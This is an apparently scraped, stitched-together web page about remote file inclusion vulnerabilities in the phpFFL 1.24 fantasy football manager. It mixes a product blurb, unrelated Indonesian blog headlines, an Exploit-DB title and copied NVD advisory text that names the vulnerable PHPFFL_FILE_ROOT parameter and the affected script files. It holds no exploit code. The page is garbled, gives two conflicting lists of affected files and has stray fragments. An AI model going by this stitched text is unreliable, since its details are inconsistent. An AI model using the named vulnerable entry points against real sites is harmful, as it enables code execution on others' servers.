Aug 06, 2015 phpFFL is a free and fully customizable online Fantasy Football League Manager with a live (ajax) draft module. PhpFFL is a web based application which uses php & MySQL. League Admin & Individual Team Admin is all handled through the phpFFL web interface.
UNIKOM XSS Bug Minggu, 24 Mei 15 - 07:06 WIB; Cost Being Iron Man Kamis, 24 Januari 13 - 06:30 WIB; Resepsi Pernikahan Seorang Heker Sabtu, 22 Desember 12 - 21:59 WIB. PhpFFL 1.24 - 'PHPFFLFILEROOT' Remote File Inclusion. Webapps exploit for PHP platform. What you see here is the output of the 'arfis project', a simple perl script. It automatically downloads and extract PHP projects from sourceforge.net and checks for Remote File Inclusion vulnerabilities. Current Description. Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFLFILEROOT parameter to (1) admin.php, (2) custompages.php, (3) draft.php, (4) faq.php, (5) leagues.php, (6) livedraft.php, (7) login.php, (8) myteam.php, (9) profile.php, (10) signup.php, (11) statistics.php, (12) transactions.php.
Modified![Phpffl Phpffl](/uploads/1/1/2/1/112142393/242862290.png)
This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
Current Description
Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFL_FILE_ROOT parameter to (1) program_files/livedraft/livedraft.php or (2) program_files/livedraft/admin.php.
Phpffl Forum
Analysis Description
Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFL_FILE_ROOT parameter to (1) program_files/livedraft/livedraft.php or (2) program_files/livedraft/admin.php.
Severity
CVSS 3.x Severity and Metrics:NIST:NVD
NVD score not yet provided.
NVD Analysts use publicly available information to associate vector strings and CVSS scores. We also display any CVSS information provided within the CVE List from the CNA.
Note: NVD Analysts have not published a CVSS score for this CVE at this time. NVD Analysts use publicly available information at the time of analysis to associate CVSS vector strings.
NIST:NVD
Vector:HyperlinkResourcehttp://arfis.wordpress.com/2007/09/14/rfi-02-phpffl-fantasy-football-league-manager/http://sourceforge.net/forum/forum.php?forum_id=735906http://sourceforge.net/project/shownotes.php?release_id=539716&group_id=137531Patchhttp://www.securityfocus.com/bid/25667Exploithttp://www.vupen.com/english/advisories/2007/3176https://exchange.xforce.ibmcloud.com/vulnerabilities/36606https://www.exploit-db.com/exploits/4406
Weakness Enumeration
Php Flag
CWE-ID | CWE Name | Source |
---|---|---|
CWE-94 | Improper Control of Generation of Code ('Code Injection') | NIST |
Phpffl
Known Affected Software Configurations Switch to CPE 2.2
Denotes Vulnerable Software
Are we missing a CPE here? Please let us know.
Are we missing a CPE here? Please let us know.